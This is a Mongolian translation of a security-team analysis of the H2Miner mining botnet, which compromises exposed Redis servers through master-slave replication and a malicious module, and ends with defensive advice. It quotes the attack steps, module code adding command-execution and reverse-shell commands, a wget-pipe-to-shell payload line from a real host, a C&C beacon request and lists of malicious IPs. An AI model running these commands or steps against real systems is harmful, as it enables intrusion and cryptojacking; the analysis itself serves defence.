Нэг өдрийн өмнө миний төслийн серверүүдийн нэг нь ижил төстэй өтний халдлагад өртсөн. "Энэ юу байсан бэ?" Гэсэн асуултын хариултыг хайж байна. Би Alibaba Cloud Security багийн гайхалтай нийтлэлийг олсон. Би энэ нийтлэлийг Хабрегийн талаар олж чадаагүй тул танд зориулж орчуулахаар шийдсэн <3
нэвтрэх
Саяхан Alibaba Cloud-ийн аюулгүй байдлын баг H2Miner гэнэтийн дэгдэлтийг илрүүлсэн. Энэ төрлийн хорлонт өт нь Redis-д зөвшөөрөлгүй эсвэл сул нууц үгийг таны системд нэвтрэх гарц болгон ашигладаг бөгөөд үүний дараа өөрийн хортой модулийг мастер-боол синхрончлолоор дамжуулан боолтой синхрончилж, эцэст нь энэ хортой модулийг халдлагад өртсөн машин руу татаж, хортойг ажиллуулдаг. зааварчилгаа.
Өмнө нь таны системд халдсан халдлагыг голчлон хуваарьт даалгавар эсвэл халдагч Redis-д нэвтэрсний дараа таны машинд бичсэн SSH түлхүүрүүдийг ашиглан хийдэг байсан. Аз болоход, зөвшөөрлийн хяналттай холбоотой асуудлууд эсвэл системийн өөр хувилбаруудаас болж энэ аргыг ихэвчлэн ашиглах боломжгүй байдаг. Гэсэн хэдий ч, хортой модулийг ачаалах энэ арга нь халдагчийн тушаалуудыг шууд гүйцэтгэх эсвэл бүрхүүлд нэвтрэх боломжтой бөгөөд энэ нь таны системд аюултай.
Интернетэд олон тооны Redis серверүүд (1 сая орчим) байрладаг тул Alibaba Cloud-ийн аюулгүй байдлын баг хэрэглэгчдэд Redis-ийг онлайнаар хуваалцахгүй байхыг зөвлөж, нууц үгийнхээ бат бөх байдал, нууц үг эвдэрсэн эсэхийг тогтмол шалгаж байхыг зөвлөж байна. хурдан сонголт.
H2Miner
H2Miner бол Hadoop ip, Docker, Redis-ийн алсын зайн тушаалын гүйцэтгэл (RCE) зэрэгт зөвшөөрөлгүй байх зэрэг янз бүрийн аргаар таны системд халдаж болох Linux-д суурилсан системүүдэд зориулсан уул уурхайн ботнет юм. Ботнет нь таны өгөгдлийг олборлох, халдлагыг хэвтээ байдлаар өргөжүүлэх, команд ба хяналтын (C&C) харилцаа холбоог хадгалахын тулд хортой скриптүүд болон хортой програмуудыг татаж авах замаар ажилладаг.
Redis RCE
Энэ талаарх мэдлэгийг Павел Топорков 2018 оны ZeroNights дээр хуваалцсан. 4.0 хувилбарын дараа Redis нь Plug-in ачаалах функцийг дэмждэг бөгөөд энэ нь хэрэглэгчдэд Redis-ийн тусгай командуудыг гүйцэтгэхийн тулд C-ээр эмхэтгэсэн файлуудыг Redis руу ачаалах боломжийг олгодог. Энэ функц нь ашигтай хэдий ч мастер-боол горимд файлуудыг fullresync горимоор дамжуулан боолтой синхрончлох боломжтой эмзэг байдлыг агуулдаг. Үүнийг халдагчид хортой файлуудыг шилжүүлэхэд ашиглаж болно. Дамжуулж дууссаны дараа халдагчид модулийг халдлагад өртсөн Redis-д ачаалж, дурын командыг гүйцэтгэнэ.
Хортой програмын хорхойн шинжилгээ
Саяхан Alibaba Cloud аюулгүй байдлын баг H2Miner хорлонтой олборлогч группын хэмжээ гэнэт огцом нэмэгдсэнийг олж мэдэв. Шинжилгээний дагуу халдлагын ерөнхий үйл явц дараах байдалтай байна.
H2Miner нь бүрэн хэмжээний дайралтанд RCE Redis ашигладаг. Халдагчид эхлээд хамгаалалтгүй Redis серверүүд эсвэл сул нууц үгтэй серверүүд рүү дайрдаг.
Дараа нь тэд тушаалыг ашигладаг config set dbfilename red2.so файлын нэрийг өөрчлөх. Үүний дараа халдагчид тушаалыг гүйцэтгэдэг slaveof мастер-боол хуулбарлах хост хаягийг тохируулах.
Халдлагад өртсөн Redis тохиолдол нь халдагчийн эзэмшдэг хорлонтой Redis-тай мастер-боол холболтыг бий болгох үед халдагчид файлуудыг синхрончлохын тулд fullresync командыг ашиглан халдвар авсан модулийг илгээдэг. Дараа нь red2.so файлыг халдлагад өртсөн машин руу татах болно. Халдагчид ./red2.so ачаалах модулийг ашиглан энэ файлыг ачаална. Модуль нь халдагчийн тушаалуудыг гүйцэтгэх эсвэл халдлагад өртсөн машин руу нэвтрэхийн тулд урвуу холболтыг (арын хаалга) эхлүүлэх боломжтой.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
гэх мэт хортой командыг гүйцэтгэсний дараа / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, халдагч нь нөөц файлын нэрийг дахин тохируулж, ул мөрийг цэвэрлэхийн тулд системийн модулийг буулгана. Гэсэн хэдий ч red2.so файл халдлагад өртсөн машин дээр хэвээр байх болно. Хэрэглэгчид өөрсдийн Redis instance-ийн хавтсанд ийм сэжигтэй файл байгаа эсэхийг анхаарч үзэхийг зөвлөж байна.
Халдагчид нөөцийг хулгайлахын тулд зарим хортой процессыг устгахаас гадна хортой хоёртын файлуудыг татаж авах, ажиллуулах замаар хортой скриптийг дагаж мөрдсөн. . Энэ нь хост дээрх kinsing-г агуулсан процессын нэр эсвэл лавлах нэр нь тухайн машин энэ вирусээр халдварлагдсаныг илтгэнэ гэсэн үг юм.
Урвуу инженерчлэлийн үр дүнгээс үзэхэд хортой програм нь үндсэндээ дараах функцуудыг гүйцэтгэдэг.
- Файлуудыг байршуулж, ажиллуулж байна
- Уул уурхай
- C&C харилцаа холбоог хадгалах, халдагчийн тушаалуудыг гүйцэтгэх
Нөлөөллөө өргөжүүлэхийн тулд гадны сканнер хийхэд masscan ашиглана уу. Нэмж дурдахад C&C серверийн IP хаяг программд хатуу кодлогдсон бөгөөд халдлагад өртсөн хост нь HTTP толгой хэсэгт зомби (эвдлэгдсэн сервер) мэдээлэл тодорхойлогдсон HTTP хүсэлтийг ашиглан C&C холбооны сервертэй холбогдох болно.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Бусад халдлагын аргууд
Хорхойн ашигладаг хаяг, холбоосууд
/хансаг
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Зөвлөгөө
Нэгдүгээрт, Редис нь интернетээс нэвтрэх боломжгүй бөгөөд хүчтэй нууц үгээр хамгаалагдсан байх ёстой. Үйлчлүүлэгчид Redis санд red2.so файл байхгүй, хост дээрх файл/процессын нэрэнд "кинsing" байхгүй эсэхийг шалгах нь чухал юм.
Эх сурвалж: www.habr.com